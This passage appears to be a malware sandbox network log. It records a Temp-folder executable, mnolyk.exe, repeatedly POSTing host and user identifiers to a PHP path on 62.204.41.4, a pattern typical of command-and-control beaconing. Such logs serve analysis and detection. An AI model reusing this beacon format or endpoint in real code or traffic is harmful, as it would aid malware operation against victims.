                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:43.965069056 CET540INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          393192.168.2.65011762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:44.156964064 CET541OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:44.221028090 CET541INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          394192.168.2.65011862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:44.402579069 CET542OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:44.465873003 CET542INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          395192.168.2.65011962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:44.644393921 CET543OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:44.708594084 CET543INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          396192.168.2.65012062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:44.901957989 CET544OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:44.966161013 CET544INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          397192.168.2.65012162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:45.141107082 CET545OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:45.206444025 CET545INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          398192.168.2.65012262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:45.389627934 CET546OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:45.454247952 CET546INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          399192.168.2.65012362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:45.637794971 CET547OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:45.702547073 CET547INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          4192.168.2.64972262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:51.810569048 CET109OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:51.875080109 CET109INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          40192.168.2.64975862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:00.586842060 CET146OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:00.650304079 CET146INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          400192.168.2.65012462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:45.914006948 CET548OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:45.979562998 CET548INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          401192.168.2.65012562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:46.439462900 CET549OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:46.504683971 CET549INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:46 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          402192.168.2.65012662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:46.754868984 CET550OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:46.818093061 CET550INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:46 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          403192.168.2.65012762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:47.079663992 CET551OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:47.145004034 CET551INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          404192.168.2.65012862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:48.244683027 CET552OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:48.310873032 CET552INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:48 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          405192.168.2.65012962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:48.528501034 CET553OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:48.591860056 CET553INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:48 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          406192.168.2.65013062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:48.878882885 CET554OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:48.944351912 CET554INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:48 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          407192.168.2.65013162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:50.831578970 CET555OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:50.898102045 CET555INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          408192.168.2.65013262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:51.157887936 CET556OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:51.223545074 CET556INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          409192.168.2.65013362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:51.437304974 CET557OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:51.502486944 CET557INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          41192.168.2.64975962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:00.829526901 CET147OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:00.893472910 CET147INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          410192.168.2.65013462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:51.667515993 CET557OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
